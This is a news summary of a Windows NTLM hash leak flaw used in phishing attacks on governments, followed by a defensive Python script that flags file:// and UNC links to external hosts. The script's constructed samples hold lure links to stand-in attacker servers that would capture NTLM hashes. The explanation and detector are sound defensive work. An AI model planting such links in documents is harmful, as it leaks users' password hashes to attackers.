
A significant security issue involving Windows has been exploited by cybercriminals targeting governments. This flaw can leak sensitive information, specifically NTLM hashes, which are a hashed form of user passwords, through phishing attacks.
The vulnerability resides in how Windows handles certain file paths when attempting to connect to remote resources. Attackers craft malicious documents or shortcut files containing embedded links that use the file:// protocol, directing the user’s system to an attacker-controlled server on the internet.
When a victim opens one of these files and Windows attempts to access the link, the operating system tries to authenticate itself to the remote server using the NTLM authentication protocol. During this process, the user’s hashed password (the NTLM hash) is automatically sent to the attacker’s server.
While the attacker doesn’t receive the plaintext password directly, the NTLM hash is still highly valuable. It can potentially be cracked offline to reveal the actual password, especially if the password is weak. Alternatively, attackers can use the leaked hash in sophisticated “pass-the-hash” attacks to authenticate to other systems or services without needing the original password.
Recent attack campaigns have specifically targeted government entities using these tactics. The malicious documents or links are often disguised with themes related to international affairs, defense, or other topics relevant to the target’s work, increasing the likelihood that a user will open them.
This type of attack highlights the importance of caution when opening files from untrusted sources and the risks associated with automatic authentication protocols like NTLM when connecting to external, potentially hostile networks. Organizations, especially governments, need to be vigilant and implement appropriate security measures to mitigate the risk of NTLM hash leaks through specially crafted phishing lures.
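One practical check a defender can run on suspicious lures is to look for the trigger the article describes: file:// URLs or UNC paths whose host sits outside the organisation, since resolving such a path is what makes Windows send the NTLM authentication. The following script is an added example, not code from the article or from BleepingComputer; the sample `.url` file and OOXML relationship fragment are constructed, and the list of internal address ranges and domain suffixes is an assumption you would replace with your own.

```python
"""Flag file:// and UNC references to external hosts in phishing-lure artifacts.

Added example. The inputs below are constructed; INTERNAL_NETS and
INTERNAL_SUFFIXES are assumptions to adapt to the environment being defended.
"""
import ipaddress
import re
from typing import List, Tuple

# Assumption: these ranges and suffixes are "inside" the organisation.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]
INTERNAL_SUFFIXES = (".corp.example", ".internal")

# Matches file://host/..., file:\\host\... and bare \\host\... references.
# '@' is allowed in the host so the WebDAV-style host@port form is caught.
# file:///C:/... (no host) deliberately does not match.
LINK_RE = re.compile(
    r"(?:file:[\\/]{2,}|\\\\)(?P<host>[A-Za-z0-9_.\-@]+)[\\/]",
    re.IGNORECASE,
)


def normalise_host(raw: str) -> str:
    """Strip a trailing @port / @SSL marker and normalise case."""
    return raw.split("@", 1)[0].rstrip(".").lower()


def is_external(host: str) -> bool:
    """True if authenticating to this host would leave the organisation."""
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass  # not an IP literal; treat as a hostname
    if "." not in host:
        return False  # single-label name: resolved by the internal domain
    return not host.endswith(INTERNAL_SUFFIXES)


def scan(text: str) -> List[Tuple[str, bool]]:
    """Return (host, is_external) for each distinct file://-style reference."""
    findings: List[Tuple[str, bool]] = []
    seen = set()
    for match in LINK_RE.finditer(text):
        host = normalise_host(match.group("host"))
        if host in seen:
            continue
        seen.add(host)
        findings.append((host, is_external(host)))
    return findings


def external_hosts(text: str) -> List[str]:
    """Sorted list of hosts that would trigger outbound NTLM authentication."""
    return sorted(h for h, ext in scan(text) if ext)


# Constructed sample: an Internet Shortcut (.url) lure.
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file://203.0.113.10@80/lure/briefing.pdf
IconFile=\\203.0.113.10\icons\doc.ico
"""

# Constructed sample: hyperlink relationships from an Office document.
SAMPLE_RELS = r"""<Relationships>
<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://evil-cdn.example.net/share/agenda.docx" TargetMode="External"/>
<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://nas.corp.example/docs/policy.docx" TargetMode="External"/>
<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="\\fileserver\share\policy.docx" TargetMode="External"/>
<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:/Users/me/notes.txt" TargetMode="External"/>
</Relationships>
"""

if __name__ == "__main__":
    for name, sample in (("url", SAMPLE_URL_FILE), ("rels", SAMPLE_RELS)):
        for host, ext in scan(sample):
            print(f"{name}: {host} -> {'EXTERNAL' if ext else 'internal'}")
```

The regex only reports references that name a host, so local `file:///C:/...` links are ignored, and single-label NetBIOS names are treated as internal because they resolve through the organisation's own name services. Scanning lures this way is a triage aid; the controls that actually stop the leak are blocking outbound SMB and WebDAV traffic at the network edge and restricting outgoing NTLM authentication on the endpoints.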
Source: https://www.bleepingcomputer.com/news/security/windows-ntlm-hash-leak-flaw-exploited-in-phishing-attacks-on-governments/